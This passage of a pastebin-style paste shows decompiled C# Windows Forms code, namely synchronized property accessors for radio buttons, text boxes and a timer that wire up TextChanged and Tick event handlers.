  974. internal virtual RadioButton RadioButton4
  975. {
  976. [DebuggerNonUserCode]
  977. get
  978. {
  979. return this._RadioButton4;
  980. }
  981. [MethodImpl(MethodImplOptions.Synchronized), DebuggerNonUserCode]
  982. set
  983. {
  984. this._RadioButton4 = value;
  985. }
  986. }
  987.  
  988. internal virtual TextBox Result
  989. {
  990. [DebuggerNonUserCode]
  991. get
  992. {
  993. return this._Result;
  994. }
  995. [MethodImpl(MethodImplOptions.Synchronized), DebuggerNonUserCode]
  996. set
  997. {
  998. EventHandler handler = new EventHandler(this.Result_TextChanged);
  999. if (this._Result != null)
  1000. {
  1001. this._Result.TextChanged -= handler;
  1002. }
  1003. this._Result = value;
  1004. if (this._Result != null)
  1005. {
  1006. this._Result.TextChanged += handler;
  1007. }
  1008. }
  1009. }
  1010.  
  1011. internal virtual TextBox TextBox1
  1012. {
  1013. [DebuggerNonUserCode]
  1014. get
  1015. {
  1016. return this._TextBox1;
  1017. }
  1018. [MethodImpl(MethodImplOptions.Synchronized), DebuggerNonUserCode]
  1019. set
  1020. {
  1021. this._TextBox1 = value;
  1022. }
  1023. }
  1024.  
  1025. internal virtual TextBox TextBox2
  1026. {
  1027. [DebuggerNonUserCode]
  1028. get
  1029. {
  1030. return this._TextBox2;
  1031. }
  1032. [MethodImpl(MethodImplOptions.Synchronized), DebuggerNonUserCode]
  1033. set
  1034. {
  1035. this._TextBox2 = value;
  1036. }
  1037. }
  1038.  
  1039. internal virtual TextBox TextBox3
  1040. {
  1041. [DebuggerNonUserCode]
  1042. get
  1043. {
  1044. return this._TextBox3;
  1045. }
  1046. [MethodImpl(MethodImplOptions.Synchronized), DebuggerNonUserCode]
  1047. set
  1048. {
  1049. EventHandler handler = new EventHandler(this.TextBox3_TextChanged);
  1050. if (this._TextBox3 != null)
  1051. {
  1052. this._TextBox3.TextChanged -= handler;
  1053. }
  1054. this._TextBox3 = value;
  1055. if (this._TextBox3 != null)
  1056. {
  1057. this._TextBox3.TextChanged += handler;
  1058. }
  1059. }
  1060. }
  1061.  
  1062. internal virtual TextBox TextBox4
  1063. {
  1064. [DebuggerNonUserCode]
  1065. get
  1066. {
  1067. return this._TextBox4;
  1068. }
  1069. [MethodImpl(MethodImplOptions.Synchronized), DebuggerNonUserCode]
  1070. set
  1071. {
  1072. this._TextBox4 = value;
  1073. }
  1074. }
  1075.  
  1076. internal virtual System.Windows.Forms.Timer Timer1
  1077. {
  1078. [DebuggerNonUserCode]
  1079. get
  1080. {
  1081. return this._Timer1;
  1082. }
  1083. [MethodImpl(MethodImplOptions.Synchronized), DebuggerNonUserCode]
  1084. set
  1085. {
  1086. EventHandler handler = new EventHandler(this.Timer1_Tick);
  1087. if (this._Timer1 != null)
  1088. {
  1089. this._Timer1.Tick -= handler;
  1090. }
  1091. this._Timer1 = value;
  1092. if (this._Timer1 != null)
  1093. {
  1094. this._Timer1.Tick += handler;
  1095. }
  1096. }
  1097. }
  1098. }
  1099. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement